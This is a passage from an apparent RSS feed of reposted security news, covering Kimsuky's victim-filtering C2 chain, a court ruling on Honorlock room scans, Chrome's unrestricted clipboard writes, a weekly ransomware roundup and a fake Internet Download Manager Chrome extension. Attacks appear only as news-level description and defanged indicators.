<div>
	<p>
		<span style="font-size:14px;">NOBELIUM frequently customizes infrastructure and capabilities per campaign, minimizing operational risk should their campaign-specific attributes be discovered.</span>
	</p>

	<p>
		 
	</p>
</div>

<p>
	<span style="font-size:14px;">“If MagicWeb is identified in your environment, it’s unlikely to match any static IOCs from other targets such as an SHA-256 value,” the company adds.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Additionally, searching for unsigned DLLs in the GAC (Global Assembly Cache) using Microsoft 365 Defender, or enumerating non-Microsoft-signed DLLs in the GAC via PowerShell, could help unearth malicious library replacements.</span>
</p>

<p>
	 
</p>

<p>
	Source: BleepingComputer
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/" rel="external nofollow">https://www.bleepingcomputer.com/news/security/microsoft-russian-malware-hijacks-adfs-to-log-in-as-anyone-in-windows/</a>
</p>
]]></description><guid isPermaLink="false">8042</guid><pubDate>Mon, 29 Aug 2022 18:36:37 +0000</pubDate></item><item><title>How 'Kimsuky' hackers ensure their malware only reach valid targets</title><link>https://nsaneforums.com/news/security-privacy-news/how-kimsuky-hackers-ensure-their-malware-only-reach-valid-targets-r8041/</link><description><![CDATA[<p>
	<span style="font-size:14px;">The North Korean 'Kimsuky' threat actors are going to great lengths to ensure that their malicious payloads are only downloaded by valid targets and not on the systems of security researchers.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">According to a Kaspersky report published today, the threat group has been employing new techniques to filter out invalid download requests since the start of 2022, when the group launched a new campaign against various targets in the Korean peninsula.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The new safeguards implemented by Kimsuky are so effective that Kaspersky reports being unable to acquire the final payloads even after successfully connecting to the threat actor’s command and control server.</span>
</p>

<h2>
	<span style="font-size:14px;">A multi-stage validation scheme</span>
</h2>

<p>
	<span style="font-size:14px;">The attacks spotted by Kaspersky begin with a phishing email sent to politicians, diplomats, university professors, and journalists in North and South Korea.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Kaspersky was able to compile a list of potential targets thanks to retrieved C2 scripts containing partial email addresses of targets.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="Potential targets derived by Kaspersky" data-ratio="78.95" width="684" src="https://www.bleepstatic.com/images/news/u/1220909/Tables/targets-list.png" />
</div>

<div>
	<span style="font-size:14px;">Potential targets derived by Kaspersky</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">The emails contain a link that takes victims to a first-stage C2 server that checks and verifies a few parameters before delivering a malicious document. If the visitor doesn’t match the list of targets, they are served an innocuous document.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The parameters include the visitor’s email address, OS (Windows is valid), and the file “[who].txt” that’s dropped by the second-stage server.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">At the same time, the visitor’s IP address is forwarded to the second-stage C2 server as a subsequent checking parameter.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The document dropped by the first-stage C2 contains a malicious macro that connects the victim to the second-stage C2, fetches the next-stage payload, and runs it with the mshta.exe process.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="Some of the documents sent to targets" data-ratio="75.10" width="719" src="https://www.bleepstatic.com/images/news/u/1220909/Phishing/documents.png" />
</div>

<div>
	<span style="font-size:14px;">Some of the documents sent to targets (Kaspersky)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">The payload is an .HTA file that also creates a scheduled task for auto-execution. Its function is to profile the victim by checking ProgramFiles folder paths, AV name, username, OS version, MS Office version, .NET framework version, and more.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The fingerprint result is stored in a string ("chnome"), a copy is sent to the C2, and a new payload is fetched and registered with a persistence mechanism.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The next payload is a VBS file that can take the victim to a legitimate blog or, if they’re valid targets, take them to the next payload-download phase.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="C2 checks are performed at each step of the infection" data-ratio="75.10" width="719" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/c2-checks.png" />
</div>

<div>
	<span style="font-size:14px;">C2 checks are performed at each step of the infection (Kaspersky)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">“Interestingly, this C2 script generates a blog address based on the victim’s IP address. After calculating the MD5 hash of the victim’s IP address, it cuts off the last 20 characters and turns it into a blog address,” <a href="https://securelist.com/kimsukys-golddragon-cluster-and-its-c2-operations/107258/" rel="external nofollow">details Kaspersky</a>.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">“The author’s intent here is to operate a dedicated fake blog for each victim, thereby decreasing the exposure of their malware and infrastructure.”</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">This is when the victim’s system is checked for the existence of the unusual “chnome” string, which was purposefully misspelled to serve as a unique validator that still doesn’t raise suspicions.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="Kimsuky latest infection process" data-ratio="75.10" width="719" src="https://www.bleepstatic.com/images/news/u/1220909/Diagrams/attack-diagram(4).png" />
</div>

<div>
	<span style="font-size:14px;">Kimsuky latest infection process (Kaspersky)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">Unfortunately, Kaspersky couldn’t continue from here and fetch the next-stage payload, so whether that would be the final one or whether there were more validation steps remains unknown.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Kimsuky is a very sophisticated threat actor recently seen deploying <a href="https://www.bleepingcomputer.com/news/security/kimsuki-hackers-use-commodity-rats-with-custom-gold-dragon-malware/" rel="external nofollow">custom malware</a> and using <a href="https://www.bleepingcomputer.com/news/security/cyberspies-use-google-chrome-extension-to-steal-emails-undetected/" rel="external nofollow">Google Chrome extensions</a> to steal emails from victims.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The campaign highlighted by Kaspersky illustrates the elaborate techniques employed by the Korean hackers to hinder analysis and make their tracking much harder.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Source: </span>BleepingComputer
</p>

<p>
	<span style="font-size:14px;"><a href="https://www.bleepingcomputer.com/news/security/how-kimsuky-hackers-ensure-their-malware-only-reach-valid-targets/" rel="external nofollow">https://www.bleepingcomputer.com/news/security/how-kimsuky-hackers-ensure-their-malware-only-reach-valid-targets/</a></span>
</p>
]]></description><guid isPermaLink="false">8041</guid><pubDate>Mon, 29 Aug 2022 18:29:44 +0000</pubDate></item><item><title>Anti-Cheating Software That Scans Students' Rooms Is Unconstitutional, Court Rules</title><link>https://nsaneforums.com/news/security-privacy-news/anti-cheating-software-that-scans-students-rooms-is-unconstitutional-court-rules-r8010/</link><description><![CDATA[<p>
	 
</p>

<p>
	<span style="font-size:24px;">The Room</span>
</p>

<p>
	 
</p>

<p>
	A federal judge just sided with a Cleveland State University student, finding that anti-cheating software used by the institution that scanned his room was unconstitutional, NPR reports.
</p>

<p>
	<br />
	The creepy third-party "e-proctoring" tool, called Honorlock, requires students to scan their rooms via webcam before an exam.
</p>

<p>
	<br />
	The decision is significant, and could serve as a precedent for millions of students in the country. It's particularly relevant because the use of tools like Honorlock has taken off since the beginning of the COVID-19 pandemic, with many more students taking exams remotely than before.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:24px;">Fourth Amendment</span>
</p>

<p>
	 
</p>

<p>
	Now, US district court judge J. Philip Calabrese decided in chemistry student Aaron Ogletree's favor, arguing that these room scans go against his Fourth Amendment rights.
</p>

<p>
	<br />
	"Mr. Ogletree's privacy interest in his home outweighs Cleveland State's interests in scanning his room," Calabrese's ruling reads. "Accordingly, the Court determines that Cleveland State's practice of conducting room scans is unreasonable under the Fourth Amendment."
</p>

<p>
	<br />
	Civil rights attorney Matthew Besser called the decision a "landmark" in a blog post, writing that it was the "first in the nation to hold that the Fourth Amendment protects students from unreasonable video searches of their homes before taking a remote test."
</p>

<p>
	<br />
	Ogletree's complaints mirror those filed by other privacy advocates, who have long argued tools like Honorlock unfairly invade students' privacy.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:24px;">Credit Score</span>
</p>

<p>
	 
</p>

<p>
	Cleveland State University, however, maintained that remote virtual room scans don't amount to "searches" and that Ogletree could've opted out, resulting in getting zero credit for the exam.
</p>

<p>
	<br />
	But that defense didn't hold, with Calabrese arguing that "room scans go where people otherwise would not, at least not without a warrant or an invitation."
</p>

<p>
	<br />
	"Nor does it follow that room scans are not searches because the technology is 'in general public use,'" he added in his verdict.
</p>

<p>
	 
</p>

<p>
	<span style="font-size:24px;"><a href="https://www.msn.com/en-us/news/us/anti-cheating-software-that-scans-students-rooms-is-unconstitutional-court-rules/ar-AA11cdhh" rel="external nofollow">Source</a></span>
</p>
]]></description><guid isPermaLink="false">8010</guid><pubDate>Sun, 28 Aug 2022 13:51:53 +0000</pubDate></item><item><title>Websites may write to the clipboard in Chrome without user permission</title><link>https://nsaneforums.com/news/security-privacy-news/websites-may-write-to-the-clipboard-in-chrome-without-user-permission-r8004/</link><description><![CDATA[<p>
	If you run Google Chrome or another Chromium-based web browser, then websites may push anything they want to the operating system's clipboard without user permission or any user action.
</p>

<p>
	 
</p>

<div>
	<img alt="chrome clipboard pasting without permission" class="ipsImage" data-ratio="75.10" height="383" width="720" src="https://www.ghacks.net/wp-content/uploads/2022/08/chrome-clipboard-pasting-without-permission.png" />
</div>


<p>
	 
</p>


<p>
	Computer users may use the clipboard of the system for temporary storage: a password for entering it on a website, a file for moving it to another location on the system, or a bit of text found on a site for pasting in a Word document or a search engine.
</p>

<p>
	 
</p>

<p>
	Sites should never have access to the content of the clipboard, at least not without user permission. Chrome and other Chromium-based browsers currently have no such restriction. The makers of the Brave web browser considered adding the user gesture requirement in 2021, but it has not been implemented in the browser. The two other major browsers that are not based on Chromium, Firefox and Safari, do protect their users' clipboards.
</p>

<p>
	 
</p>

<p>
	Visit the <a data-wpel-link="external" href="https://webplatform.news/" rel="external nofollow" target="_blank">Webplatform News</a> website to test your browser. All it takes is to visit the site and check the content of the clipboard afterwards.
</p>

<p>
	 
</p>

<p>
	If you get the following message in your clipboard, the browser is vulnerable to unauthorized clipboard manipulation:
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	Hello, this message is in your clipboard because you visited the website Web Platform News in a browser that allows websites to write to the clipboard without the user’s permission. Sorry for the inconvenience. For more information about this issue, see <a href="https://github.com/w3c/clipboard-apis/issues/182" ipsnoembed="false" rel="external nofollow">https://github.com/w3c/clipboard-apis/issues/182</a>.
</p>

<p>
	 
</p>

<p>
	All Chromium-based browsers that are up to date are affected by this. Firefox and Safari do require a user gesture before websites may copy content to the device's clipboard. User gesture in this context means that the user is selecting content on the site and using Ctrl-C or other means to copy it to the clipboard.
</p>

<p>
	 
</p>

<p>
	A bug report on the Chromium website highlights that the restriction to require a user gesture before reading or writing to the clipboard has been removed. The reason given: it breaks NTP doodle sharing.
</p>

<p>
	 
</p>

<p style="margin-left: 40px;">
	Adding user gesture requirement for readText and writeText APIs<br>
	breaks NTP doodle sharing. We are relaxing this check for now, but<br>
	we should fix this for sites to not rely on these APIs to be called<br>
	without a user gesture.
</p>

<p style="margin-left: 40px;">
	<br>
	See NewTabPageDoodleShareDialogFocusTest.All test for more details.
</p>

<p>
	 
</p>

<p>
	NTP refers to the New Tab Page of the browser, doodles are Google Doodles, variations of the Google logo that highlight events or people.
</p>

<p>
	 
</p>

<p>
	On this GitHub page, the assumption is made that the user gesture requirement could break remote clipboard synchronization in browsers.
</p>

<p>
	 
</p>

<p>
	<strong>Now You</strong>: is your browser vulnerable?
</p>

<p>
	 
</p>


<p>
	 
</p>

<p>
	<a href="https://www.ghacks.net/2022/08/27/websites-may-write-to-the-clipboard-in-chrome-without-user-permission/" rel="external nofollow">Websites may write to the clipboard in Chrome without user permission</a>
</p>
]]></description><guid isPermaLink="false">8004</guid><pubDate>Sat, 27 Aug 2022 20:51:42 +0000</pubDate></item><item><title>The Week in Ransomware - August 26th 2022 - Fighting back</title><link>https://nsaneforums.com/news/security-privacy-news/the-week-in-ransomware-august-26th-2022-fighting-back-r8002/</link><description><![CDATA[<p>
	We saw a bit of ransomware drama this week, mostly centered around LockBit, who saw their data leak sites taken down by a DDoS attack after they started leaking the allegedly stolen Entrust data.
</p>

<p>
	 
</p>

<p>
	Last week, <a href="https://www.bleepingcomputer.com/news/security/lockbit-claims-ransomware-attack-on-security-giant-entrust-leaks-data/" target="_blank" rel="external nofollow">LockBit claimed responsibility</a> for a <a href="https://www.bleepingcomputer.com/news/security/digital-security-giant-entrust-breached-by-ransomware-gang/" target="_blank" rel="external nofollow">ransomware attack on cybersecurity giant Entrust</a> and began leaking the company's allegedly stolen data Friday evening.
</p>

<p>
	 
</p>

<p>
	Soon after leaking the data, LockBit's Tor data leak sites experienced a DDoS attack that made them inaccessible.
</p>

<p>
	 
</p>

<div>
	<p>
		<img alt="ddos-useragent.jpg" class="ipsImage" data-ratio="13.89" height="48" width="720" src="https://www.bleepstatic.com/images/news/ransomware/l/lockbit/ddos-entrust/ddos-useragent.jpg">
	</p>

	<div>
		<em>DDoS HTTPS requests with a message to LockBit</em>
	</div>

	<p>
		 
	</p>
</div>

<p>
	Researchers released reports this week on a <a href="https://www.bleepingcomputer.com/news/security/hackers-abuse-genshin-impact-anti-cheat-system-to-disable-antivirus/" target="_blank" rel="external nofollow">Genshin Impact anti-cheat driver being abused</a> to terminate antivirus processes during ransomware attacks and a <a href="https://www.bleepingcomputer.com/news/security/new-donut-leaks-extortion-gang-linked-to-recent-ransomware-attacks/" target="_blank" rel="external nofollow">new extortion group called Donut Leaks</a>.
</p>

<p>
	 
</p>

<p>
	Finally, this week's ransomware attacks include <a href="https://www.bleepingcomputer.com/news/security/greek-natural-gas-operator-suffers-ransomware-related-data-breach/" target="_blank" rel="external nofollow">DESFA</a>, <a href="https://www.bleepingcomputer.com/news/security/french-hospital-hit-by-10m-ransomware-attack-sends-patients-elsewhere/" target="_blank" rel="external nofollow">Center Hospitalier Sud Francilien (CHSF)</a>, <a href="https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-disrupts-govt-agency-in-dominican-republic/" target="_blank" rel="external nofollow">Instituto Agrario Dominicano</a>, and <a href="https://www.bleepingcomputer.com/news/security/ransomexx-claims-ransomware-attack-on-sea-doo-ski-doo-maker/" target="_blank" rel="external nofollow">Bombardier Recreational Products (BRP)</a>.
</p>

<p>
	 
</p>

<p>
	Contributors and those who provided new ransomware information and stories this week include: <a href="https://twitter.com/VK_Intel" rel="external nofollow" target="_blank">@VK_Intel</a>, <a href="https://twitter.com/LawrenceAbrams" rel="external nofollow" target="_blank">@LawrenceAbrams</a>, <a href="https://twitter.com/jorntvdw" rel="external nofollow" target="_blank">@jorntvdw</a>, <a href="https://twitter.com/billtoulas" rel="external nofollow" target="_blank">@billtoulas</a>, <a href="https://twitter.com/demonslay335" rel="external nofollow" target="_blank">@demonslay335</a>, <a href="https://twitter.com/PolarToffee" rel="external nofollow" target="_blank">@PolarToffee</a>, <a href="https://twitter.com/Ionut_Ilascu" rel="external nofollow" target="_blank">@Ionut_Ilascu</a>, <a href="https://twitter.com/Seifreed" rel="external nofollow" target="_blank">@Seifreed</a>, <a href="https://twitter.com/fwosar" rel="external nofollow" target="_blank">@fwosar</a>, <a href="https://twitter.com/DanielGallagher" rel="external nofollow" target="_blank">@DanielGallagher</a>, <a href="https://twitter.com/struppigel" rel="external nofollow" target="_blank">@struppigel</a>, <a href="https://twitter.com/BleepinComputer" rel="external nofollow" target="_blank">@BleepinComputer</a>, <a href="https://twitter.com/malwareforme" rel="external nofollow" target="_blank">@malwareforme</a>, <a href="https://twitter.com/serghei" rel="external nofollow" target="_blank">@serghei</a>, <a href="https://twitter.com/FourOctets" rel="external nofollow" target="_blank">@FourOctets</a>, <a href="https://twitter.com/malwrhunterteam" rel="external nofollow" target="_blank">@malwrhunterteam</a>, <a href="https://twitter.com/trendmicro" rel="external nofollow" target="_blank">@TrendMicro</a>, <a href="https://twitter.com/GossiTheDog" rel="external nofollow" target="_blank">@GossiTheDog</a>, <a href="https://twitter.com/AlvieriD" rel="external nofollow" target="_blank">@AlvieriD</a>, <a 
href="https://twitter.com/ValeryMarchive" rel="external nofollow" target="_blank">@ValeryMarchive</a>, <a href="https://twitter.com/Cyberknow20" rel="external nofollow" target="_blank">@Cyberknow20</a>, <a href="https://twitter.com/venezuelabth" rel="external nofollow" target="_blank">@VenezuelaBTH</a>, <a href="https://twitter.com/S0ufi4n3" rel="external nofollow" target="_blank">@S0ufi4n3</a>, <a href="https://twitter.com/vxunderground" rel="external nofollow" role="link" tabindex="-1" target="_blank">@vxunderground</a>, <a href="https://twitter.com/AShukuhi" rel="external nofollow" role="link" tabindex="-1" target="_blank">@AShukuhi</a>, <a href="https://twitter.com/pcrisk" rel="external nofollow" role="link" tabindex="-1" target="_blank">@pcrisk</a>, and <a href="https://twitter.com/ddd1ms" rel="external nofollow" target="_blank">@ddd1ms</a>.
</p>

<h2>
	August 20th 2022
</h2>

<h3>
	<a href="https://twitter.com/malwrhunterteam/status/1560962574245679104" rel="external nofollow" target="_blank">New PT_Moisha ransomware</a>
</h3>

<p>
	<a href="https://twitter.com/malwrhunterteam" rel="external nofollow" target="_blank">MalwareHunterTeam</a> found a sample of the new PT_Moisha ransomware operation after users opened a <a href="https://www.bleepingcomputer.com/forums/t/775959/moisha-ransomware-support-topic/" target="_blank" rel="external nofollow">support topic</a> in the BleepingComputer forums. The ransomware does not append a new extension to encrypted files and drops a ransom note named !!!READ TO RECOVER YOUR DATA!!! PT_MOISHA.html.
</p>

<h2>
	August 22nd 2022
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/lockbit-ransomware-blames-entrust-for-ddos-attacks-on-leak-sites/" target="_blank" rel="external nofollow">LockBit ransomware blames Entrust for DDoS attacks on leak sites</a>
</h3>

<p>
	The LockBit ransomware operation's data leak sites have been shut down over the weekend due to a DDoS attack telling them to remove Entrust's allegedly stolen data.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/greek-natural-gas-operator-suffers-ransomware-related-data-breach/" target="_blank" rel="external nofollow">Greek natural gas operator suffers ransomware-related data breach</a>
</h3>

<p>
	Greece's largest natural gas distributor DESFA confirmed on Saturday that they suffered a limited scope data breach and IT system outage following a cyberattack.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1561663973484789761" rel="external nofollow" target="_blank">New Phobos variant</a>
</h3>

<p>
	<a href="https://twitter.com/pcrisk" rel="external nofollow" role="link">PCrisk</a> found a new Phobos ransomware variant that appends the .KOPYTZEMPEREEBET extension.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1561668756375494656" rel="external nofollow" target="_blank">New STOP ransomware variant</a>
</h3>

<p>
	PCrisk found a new STOP ransomware variant that appends the .qqjj extension.
</p>

<h2>
	August 23rd 2022
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/new-donut-leaks-extortion-gang-linked-to-recent-ransomware-attacks/" target="_blank" rel="external nofollow">New 'Donut Leaks' extortion gang linked to recent ransomware attacks</a>
</h3>

<p>
	A new data extortion group named 'Donut Leaks' is linked to recent cyberattacks, including those on Greek natural gas company DESFA, UK architectural firm Sheppard Robson, and multinational construction company Sando.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/french-hospital-hit-by-10m-ransomware-attack-sends-patients-elsewhere/" target="_blank" rel="external nofollow">French hospital hit by $10M ransomware attack, sends patients elsewhere</a>
</h3>

<p>
	The Center Hospitalier Sud Francilien (CHSF), a 1000-bed hospital located 28km from the center of Paris, suffered a cyberattack on Sunday, which has resulted in the medical center referring patients to other establishments and postponing appointments for surgeries.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1561933971138777089" rel="external nofollow" target="_blank">New Dharma ransomware variant</a>
</h3>

<p>
	PCrisk found a new Dharma variant that appends the .zxcvb extension.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1561961472380608516" rel="external nofollow" target="_blank">New STOP ransomware variant</a>
</h3>

<p>
	PCrisk found a new STOP ransomware variant that appends the .qqkk extension.
</p>

<h2>
	August 24th 2022
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/quantum-ransomware-attack-disrupts-govt-agency-in-dominican-republic/" target="_blank" rel="external nofollow">Quantum ransomware attack disrupts govt agency in Dominican Republic</a>
</h3>

<p>
	The Dominican Republic's Instituto Agrario Dominicano has suffered a Quantum ransomware attack that encrypted multiple services and workstations throughout the government agency.
</p>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/ransomexx-claims-ransomware-attack-on-sea-doo-ski-doo-maker/" target="_blank" rel="external nofollow">RansomEXX claims ransomware attack on Sea-Doo, Ski-Doo maker</a>
</h3>

<p>
	The RansomEXX ransomware gang is claiming responsibility for the cyberattack against Bombardier Recreational Products (BRP), disclosed by the company on August 8, 2022.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1562322545755439104" rel="external nofollow" target="_blank">New STOP ransomware variant</a>
</h3>

<p>
	PCrisk found a new STOP ransomware variant that appends the .qqpp extension.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1562339893371600896" rel="external nofollow" target="_blank">New Scarab ransomware variant</a>
</h3>

<p>
	PCrisk found a new Scarab ransomware variant that appends the .ZZZZZ extension.
</p>

<h3>
	<a href="https://twitter.com/pcrisk/status/1562339893371600896" rel="external nofollow" target="_blank">New DonkeyHot ransomware</a>
</h3>

<p>
	PCrisk found a new ransomware named 'DonkeyHot' that appends the .DONKEYHOT extension and drops a ransom note named #HOW_TO_DECRYPT#.txt.
</p>

<h2>
	August 25th 2022
</h2>

<h3>
	<a href="https://www.bleepingcomputer.com/news/security/hackers-abuse-genshin-impact-anti-cheat-system-to-disable-antivirus/" target="_blank" rel="external nofollow">Hackers abuse Genshin Impact anti-cheat system to disable antivirus</a>
</h3>

<p>
	Hackers are abusing an anti-cheat system driver for the immensely popular Genshin Impact game to disable antivirus software while conducting ransomware attacks.
</p>

<h3>
	<a href="https://www.lemagit.fr/actualites/252524082/Derriere-la-cyberattaque-au-centre-hospitalier-Sud-Francilien-LockBit" rel="external nofollow" target="_blank">Cyberattack: misappropriation of provider account suspected at CHSF</a>
</h3>

<p>
	According to our information, the investigators in charge of the cyberattack that led to the LockBit ransomware outbreak last weekend at the Sud-Francilien hospital center (CHSF) in Corbeil-Essonnes currently suspect that the hijacking of a software vendor's support account served as the initial intrusion vector.
</p>

<h2>
	August 26th 2022
</h2>

<h3>
	<a href="https://therecord.media/an-interview-with-initial-access-broker-wazawaka-there-is-no-such-money-anywhere-as-there-is-in-ransomware/" rel="external nofollow" target="_blank">An interview with initial access broker Wazawaka: ‘There is no such money anywhere as there is in ransomware’</a>
</h3>

<p>
	Matveev talked to Recorded Future analyst and product manager Dmitry Smilyanets about his interaction with other hackers, details about ransomware attacks he’s been involved in, and how he settled on the name Babuk. The conversation was conducted in Russian and was translated to English with the help of linguists from Recorded Future’s Insikt group.
</p>

<h3>
	That's it for this week! Hope everyone has a nice weekend!
</h3>

<p>
	 
</p>

<p>
	<a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-26th-2022-fighting-back/" rel="external nofollow">The Week in Ransomware - August 26th 2022 - Fighting back</a>
</p>
]]></description><guid isPermaLink="false">8002</guid><pubDate>Sat, 27 Aug 2022 20:47:26 +0000</pubDate></item><item><title>Fake Chrome extension 'Internet Download Manager' has 200,000 installs</title><link>https://nsaneforums.com/news/security-privacy-news/fake-chrome-extension-internet-download-manager-has-200000-installs-r7991/</link><description><![CDATA[<p>
	<span style="font-size:14px;">Google Chrome extension 'Internet Download Manager' installed by more than 200,000 users is adware.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The extension has been sitting on the Chrome Web Store since at least June 2019, according to the earliest reviews posted by users.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Although the extension may install a known and legitimate download manager program, BleepingComputer observed unwanted behavior exhibited by the extension—such as opening links to spammy sites, changing the default browser search engine, and further hounding the user with pop-ups asking them to download more "patches" and unwanted programs.</span>
</p>

<h2>
	Dodgy Chrome extension installed by 200,000+ users
</h2>

<p>
	<span style="font-size:14px;">A concerned BleepingComputer reader reached out to us on seeing a Chrome add-on "running malicious sites by impersonating famous software."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">And their concern seems valid. The 'Internet Download Manager' browser extension installed by more than 200,000 users to date doesn't seem all that innocent.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="chrome-web-store-extension.jpeg" class="ipsImage" data-ratio="75.10" height="510" width="720" src="https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/chrome-extension-adware/chrome-web-store-extension.jpeg">
</div>

<div>
	<em><span style="font-size:14px;">Chrome extension Internet Download Manager live on Chrome Web Store (BleepingComputer)</span></em>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">There does exist a legitimate Windows program called Internet Download Manager, published by software company Tonec.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Tonec does offer Internet Download Manager extensions for Firefox and Chrome. But, the authentic Chrome extension provided by the company is called <a href="https://chrome.google.com/webstore/detail/idm-integration-module/ngpampappnmepgilojfohadhhmbhlaek" rel="external nofollow">'IDM Integration Module</a>.'</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Further, Tonec's FAQ specifically <a href="http://www.internetdownloadmanager.com/register/new_faq/chrome_extension.html" rel="external nofollow">warns</a>, "Please note that all IDM extensions that can be found in Google Store are fake and should not be used."</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">By contrast, the counterfeit 'Internet Download Manager' Chrome extension seems to be maintained by a website called "<a href="https://www.puupnewsapp.com/internet-download-manager-for-chrome/" rel="external nofollow">Puupnewsapp</a>" that claims "it increases your download speed up to 500%" making it a "super software" for downloading games, movies, music, and "large files in minutes." Sounds promising.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The instructions provided by the knock-off extension are even more perplexing—why does one need to download and install multiple programs after installing the extension?</span>
</p>

<p>
	 
</p>

<div>
	<img alt="instructions.jpg" class="ipsImage" data-ratio="75.10" height="540" width="608" src="https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/chrome-extension-adware/instructions.jpg">
</div>

<div>
	<em><span style="font-size:14px;">Installation steps for the extension prompt users to further install programs (BleepingComputer)</span></em>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">Specifically, after installing 'Internet Download Manager,' users are then asked to install an executable from the puupnewsapp website, and additionally to download a "Windows patch" ZIP file:</span>
</p>

<p style="margin-left: 40px;">
	 
</p>

<div style="margin-left: 40px;">
	<span style="font-size:14px;">hxxps://www.puupnewsapp[.]com/idman638build25.exe<br>
	hxxps://www.puupnewsapp[.]com/windows.zip</span>
</div>

<p style="margin-left: 40px;">
	 
</p>

<p>
	<span style="font-size:14px;">The 'idman638build25.exe' executable appears to be <a href="https://www.virustotal.com/gui/file/fcb83024e4388db05b0b0b25b340617cb0900cf02c6ddab269bccba2b8037e50" rel="external nofollow">a valid, signed version</a> of the legitimate Tonec Internet Download Manager.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The 'windows.zip' archive analyzed by BleepingComputer contains both 32-bit and 64-bit builds of <a href="https://nodejs.org/en/" rel="external nofollow">NodeJS</a>, which are used to run a bundled JavaScript file that modifies Windows registry settings for Chrome and Firefox.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="nodejs-instructions.jpg" class="ipsImage" data-ratio="75.10" height="394" width="720" src="https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/chrome-extension-adware/nodejs-instructions.jpg">
</div>

<div>
	<em><span style="font-size:14px;">NodeJS file making registry changes for Firefox and Chrome (BleepingComputer)</span></em>
</div>

<h2>
	Alters search engines, promotes spam
</h2>

<p>
	<span style="font-size:14px;">What also stood out to us was that installing the extension in a <a href="https://app.any.run/tasks/d3d5552b-f94a-43f5-804d-ad5cbbee7a5f/" rel="external nofollow">test environment</a> changed the default browser search engine to smartwebfinder[.]com. </span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">Frequent pop-ups urging the user to install more add-ons, such as for Firefox, were also observed, as was the extension launching third-party sites in the browser.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="smartwebfinder.jpg" class="ipsImage" data-ratio="65.28" height="328" width="720" src="https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/chrome-extension-adware/smartwebfinder.jpg">
</div>

<div>
	<em><span style="font-size:14px;">Default search engine changed by extension (BleepingComputer)</span></em>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">Luckily, some reviewers, a few from as early as 2019, spotted the dodgy behavior, although plenty of (likely inauthentic) reviews claim to have no issues with the extension.</span>
</p>

<p>
	 
</p>

<div>
	<img alt="chrome-extension-reviews.jpg" class="ipsImage" data-ratio="75.10" height="365" width="720" src="https://www.bleepstatic.com/images/news/u/1164866/2022/Aug-2022/chrome-extension-adware/chrome-extension-reviews.jpg">
</div>

<div>
	<span style="font-size:14px;">Multiple reviews call out the "spam" extension (BleepingComputer)</span>
</div>

<div>
	 
</div>

<p>
	<span style="font-size:14px;">BleepingComputer readers have previously reported issues with <a href="https://www.bleepingcomputer.com/forums/t/595618/idm-rogue-extension-keeps-reinstalling-itself-in-chrome/" rel="external nofollow">similar rogue extensions</a> they'd found on the Chrome Web Store.</span>
</p>

<p>
	 
</p>

<p>
	<span style="font-size:14px;">The particulars of the counterfeit extension are as follows:</span>
</p>

<div>
	<p>
		 
	</p>

	<p style="margin-left: 40px;">
